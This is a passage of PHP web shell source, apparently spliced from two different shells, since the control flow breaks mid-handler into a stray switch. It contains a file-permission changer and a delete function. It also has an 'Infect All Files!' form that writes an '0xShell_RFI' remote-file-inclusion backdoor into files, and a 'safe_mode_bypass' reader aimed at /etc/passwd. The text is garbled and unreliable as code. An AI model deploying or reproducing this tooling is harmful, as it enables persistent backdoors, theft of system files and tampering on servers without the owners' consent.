if (!$mode) {
echo "<b>Change file-mode with error:</b> can't get current value.";
} else {
$form = TRUE;
if ($chmod_submit) {
$octet = "0" . base_convert(($chmod_o["r"] ? 1 : 0) . ($chmod_o["w"] ? 1 : 0) . ($chmod_o["x"] ? 1 : 0) . ($chmod_g["r"] ? 1 : 0) . ($chmod_g["w"] ? 1 : 0) . ($chmod_g["x"] ? 1 : 0) . ($chmod_w["r"] ? 1 : 0) . ($chmod_w["w"] ? 1 : 0) . ($chmod_w["x"] ? 1 : 0), 2, 8);
if (chmod($d . $f, $octet)) {
$act = "ls";
$form = FALSE;
$err = "";
} else {
$err = "Can't chmod to " . $octet . ".";
}
}
if ($form) {
$perms = parse_perms($mode);
echo "<b>Changing file-mode (" . $d . $f . "), " . view_perms_color($d . $f) . " (" . substr(decoct(fileperms($d . $f)), -4, 4) . ")</b><br>" . ($err ? "<b>Error:</b> " . $err : "") . "<form action=\"" . $surl . "\" method=POST><input type=hidden name=d value=\"" . htmlspecialchars($d) . "\"><input type=hidden name=f value=\"" . htmlspecialchars($f) . "\"><input type=hidden name=act value=chmod><table align=left width=300 border=0 cellspacing=0 cellpadding=5><tr><td><b>Owner</b><br><br><input type=checkbox NAME=chmod_o[r] value=1" . ($perms["o"]["r"] ? " checked" : "") . "> Read<br><input type=checkbox name=chmod_o[w] value=1" . ($perms["o"]["w"] ? " checked" : "") . "> Write<br><input type=checkbox NAME=chmod_o[x] value=1" . ($perms["o"]["x"] ? " checked" : "") . ">eXecute</td><td><b>Group</b><br><br><input type=checkbox NAME=chmod_g[r] value=1" . ($perms["g"]["r"] ? " checked" : "") . "> Read<br><input type=checkbox NAME=chmod_g[w] value=1" . ($perms["g"]["w"] ? " checked" : "") . "> Write<br><input type=checkbox NAME=chmod_g[x] value=1" . ($perms["g"]["x"] ? " checked" : "") . ">eXecute</font></td><td><b>World</b><br><br><input type=checkbox NAME=chmod_w[r] value=1" . ($perms["w"]["r"] ? " checked" : "") . "> Read<br><input type=checkbox NAME=chmod_w[w] value=1" . ($perms["w"]["w"] ? " checked" : "") . "> Write<br><input type=checkbox NAME=chmod_w[x] value=1" . ($perms["w"]["x"] ? " checked" : "") . ">eXecute</font></td></tr><tr><td><input type=submit name=chmod_submit value=\"Save\"></td></tr></table></form>";
}
}
}
if ($act == "upload") {
$uploadmess = "";
$uploadpath = str_replace("\\", DIRECTORY_SEPARATOR, $uploadpath);
if (empty($uploadpath)) {
$uploadpath = $d;
} elseif (substr($uploadpath, -1) != "/") {
$uploadpath .= "/";
}
if (!empty($submit)) {
global $HTTP_POST_FILES;
$uploadfile = $HTTP_POST_FILES["uploadfile"];
} else {
print "<form method='post' action='" . $patch . "?action=infect_all_file'>\n" . "<textarea name='cod3inf' cols=50 rows=4>\n" . "<?php include(\$GET['0xShell_RFI']); ?>\n" . "</textarea>\n" . "<br /><input type='submit' value='Infect All Files!' name='inf3ct'><br />\n";
}
break;
case 'safe_mode_bypass':
print "<form action='" . $patch . "?action=safe_mode_bypass' method='POST'>\n" . "File Name: <input type='text' name='filew' value='/etc/passwd'><br />\n" . "<input type='submit' value='Read File' name='red_file'>\n" . "</form>\n";
if (isset($_POST['red_file'])) {
if (empty($_POST['filew'])) {
die("[ERROR] Enter the name file.");
} else {
safe_mode_bypass($_POST['filew']);
}
}
break;
case 'chmod':
$perms = parse_perms(fileperms($_GET['file']));
print "<form action=\"" . $patch . "?action=chmod&file=" . htmlspecialchars($_GET['file']) . "\" method=\"POST\">\n\t\t\t\t<h3 align=\"center\">Chmod File: <i>" . htmlspecialchars($_GET['file']) . " - (" . view_perms_color($_GET['file']) . ")</i></h3><br />\n\t\t\t\t<table align=center width=300 border=0 cellspacing=0 cellpadding=5>\n\t\t\t\t<tr><td><b>Owner</b><br><br>\n\t\t\t\t <input type=checkbox NAME='chmod_o_r' value=1" . ($perms["o"]["r"] ? " checked" : "") . ">Read\n\t\t\t\t<br><input type=checkbox name='chmod_o_w' value=1" . ($perms["o"]["w"] ? " checked" : "") . ">Write\n\t\t\t\t<br><input type=checkbox NAME='chmod_o_x' value=1" . ($perms["o"]["x"] ? " checked" : "") . ">eXecute</td>\n\t\t\t\t<td><b>Group</b><br><br>\t\t\t\t\n\t\t\t\t <input type=checkbox NAME='chmod_g_r' value=1" . ($perms["g"]["r"] ? " checked" : "") . ">Read\n\t\t\t\t<br><input type=checkbox NAME='chmod_g_w' value=1" . ($perms["g"]["w"] ? " checked" : "") . ">Write\n\t\t\t\t<br><input type=checkbox NAME='chmod_g_x' value=1" . ($perms["g"]["x"] ? " checked" : "") . ">eXecute\n\t\t\t\t</font></td>\t\t\t\t\n\t\t\t\t<td><b>World</b><br><br>\n\t\t\t\t <input type=checkbox NAME='chmod_w_r' value=1" . ($perms["w"]["r"] ? " checked" : "") . ">Read\n\t\t\t\t<br><input type=checkbox NAME='chmod_w_w' value=1" . ($perms["w"]["w"] ? " checked" : "") . ">Write\n\t\t\t\t<br><input type=checkbox NAME='chmod_w_x' value=1" . ($perms["w"]["x"] ? " checked" : "") . ">eXecute\n\t\t\t\t</font></td></tr><tr><td>\n\t\t\t\t<input type='submit' name='chmod_edit' value='Save'>\n\t\t\t\t</td></tr>\n\t\t\t\t</table>\n\t\t\t\t</form>";
if (isset($_POST['chmod_edit'])) {
$perms_final = "0" . base_convert((@$_POST['chmod_o_r'] ? 1 : 0) . (@$_POST['chmod_o_w'] ? 1 : 0) . (@$_POST['chmod_o_x'] ? 1 : 0) . (@$_POST['chmod_g_r'] ? 1 : 0) . (@$_POST['chmod_g_w'] ? 1 : 0) . (@$_POST['chmod_g_x'] ? 1 : 0) . (@$_POST['chmod_w_r'] ? 1 : 0) . (@$_POST['chmod_w_w'] ? 1 : 0) . (@$_POST['chmod_w_x'] ? 1 : 0), 2, 8);
print chmod_shell($_GET['file'], $perms_final);
}
break;
}
if (isset($remove_file)) {
//Rimozione file
if (!is_writable($remove_file)) {
die("File Not Deleted");
}
if (unlink($remove_file)) {
print "<script>alert('File Deleted'); location.href='" . $patch . "';</script>";
} else {
